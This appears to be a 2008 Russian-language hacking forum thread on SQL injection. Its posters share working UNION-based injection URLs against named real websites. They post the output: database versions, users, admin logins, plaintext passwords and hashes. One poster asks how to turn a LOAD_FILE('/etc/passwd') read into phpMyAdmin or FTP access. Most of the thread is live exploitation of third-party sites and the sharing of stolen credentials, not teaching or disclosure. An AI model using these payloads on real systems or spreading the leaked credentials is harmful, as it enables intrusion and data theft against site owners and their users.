SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать... :(
     
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
     
  3. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"
     
  4. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    ковычка не нужна
     
    2 people like this.
  5. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    ага, убрал ее! но что то никак не выходит, перебираю 1,2,3.. и т.д. php выдаёт "The used SELECT statements have a different number of columns"
     
  6. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ура получилось, не терпиливый я ЛОХ...
     
  7. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят, а что дальше то делать? Ну получил я DATABASE(), USER(), VERSION() и LOAD_FILE('/etc/passwd')! Но что с этим добром делать, мне нужен просто дам базы данных либо вход через phpmyadmin либо аккаунт ftp

    Помогите плис :(
     
  8. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    мде,искал се сумку в инет шопах,а нашел sql inc=)
    хотя это и не инет шоп,но все же
    http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    5.1.16-beta
    catalog1
    catalog1@localhost
     
  9. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5,6,7+from+mysql.user/*" ?
     
  10. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    хорош тут уже фигней страдать,сходи почитай статтьи на этом сайте все есть,

    а вообще вот
    http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,concat_ws(0x2F,user,password),5,6,7+from+mysql.user/*
     
    3 people like this.
  11. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Блин тут не надо писать вопросы, вот ТУТ задавай вопросы!
     
    2 people like this.
  12. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    приглянувшиеся таблицы
    дима:дима:[email protected]
    ---------------------------------------------------------------------
    ---------------------------------------------------------------------
    БIЗНЕС-ПОРТАЛ
    CЛАВУТЧИНИ

    5.0.22-log:kraibiz@localhost:Comissar42_krai

    ----------------------------------------------------------------------
    ---------------------------------------------------------------------
    skyinform
    мы знаем все об авиаперевозах​

    есть доступ к information_schema.tables
     
    #5132 samarin, 23 Mar 2008
    Last edited: 24 Mar 2008
    2 people like this.
  13. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/*
    VERSION: 5.0.27-standard
    USER: [email protected]
    DATABASE: cmeadmin_comexusonline
    PR: 6
     
    1 person likes this.
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    admin:abcat5&dog5
     
    2 people like this.
  15. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    VERSION: 4.0.27-log
    DATABASE: xbizpress
    USER: [email protected]
    PR: 4

    ***************************************

    Всем срочно хостится:

    Code:
    http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),user())/*
    VERSION: 4.1.11-Debian_4sarge8-log
    DATABASE: usr_sat0_4
    USER: sat0@localhost
    PR: 3

    Code:
    http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+admin/*
    host247:3727ee3a03fac1457d6aa96e372ada0c
     
    #5135 t0ox, 24 Mar 2008
    Last edited: 24 Mar 2008
  16. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    http://www.gamingreport.com/print.php?sid=249729999+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(),user())/*
    сайт кишит sql inc
    --------
    http://www.nfb.ca/sections/thematique.php?id=102+and+substring(version(),1,1)=5/*
    http://www.worldnetdaily.com/index.php?fa=PAGE.view&pageId=5845899999+UNION+SELECT+1,2,3,4,5,6,7,8/*
     
    2 people like this.
  17. Klaus Doring

    Klaus Doring Elder - Старейшина

    Joined:
    23 Jul 2007
    Messages:
    48
    Likes Received:
    16
    Reputations:
    0
    admin : 4cb9c8a8048fd02294477fcb1a41191a
     
  18. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Танцивальный клуб "Россис"

    http://www.rossis.ru/news/?nid=-6+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5+from+information_schema.columns+limit+1,1/*

    http://www.rossis.ru/news/?nid=-6+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password),0x71),0x71),4,5+from+titles+limit+0,1/*
    (Отсутствует вывод :( )

    ---------------------------------------------------------------------------------------------

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(user_name,char(58),user_password,char(58),user_id),7+from+cpg130_users+limit+1,3/*

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(username,char(58),password),7+from+users+limit+0,100/*

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7+from+INFORMATION_SCHEMA.COLUMNS+limit+0,50000/*
     
    #5138 Snap, 24 Mar 2008
    Last edited: 24 Mar 2008
    1 person likes this.
  19. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.gykd.co.za/gykd/reviews/bikes.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(version(),database(),user()),11,12,13,14,15,16,17,18,19/*
    DATABASE: gykd
    VERSION: 4.0.17
    USER: web@localhost
    PR: 2

    ******************************

    Code:
    http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
    DATABASE: boskobosko
    VERSION: 5.0.44-log
    USER: [email protected]
    PR: 4

    Code:
    http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,pass,3,4,5,6,login,8,id,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users+where+id=1/*
    LOGIN: wrzeszcz
    PASS: bosko

    ******************************

    поправления к моему посту.

    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,3/*
    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(version(),database(),user())/*
    DATABASE: rtf
    VERSION: 5.0.22
    USER: root@localhost
    PR: 6

    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,userpassword)+from+user/*
    carla:52a250762b8d0573

    хэш неосилил

    http://www.rtp.org/admin/loginform.php
     
    #5139 t0ox, 24 Mar 2008
    Last edited: 24 Mar 2008
    1 person likes this.
  20. Loker

    Loker Elder - Старейшина

    Joined:
    25 Oct 2007
    Messages:
    46
    Likes Received:
    23
    Reputations:
    5
    http://sanprosvet.ru/ru/page/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/*

    Version 5.27

    Фен шуй
    http://www.fengshuiby.com/ru/page/index.php?id=-8+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/*
    Version 4.1.22-standart
    User siteis_user@localhost
    Database siteis_siteis
     
    #5140 Loker, 24 Mar 2008
    Last edited: 24 Mar 2008
Thread Status:
Not open for further replies.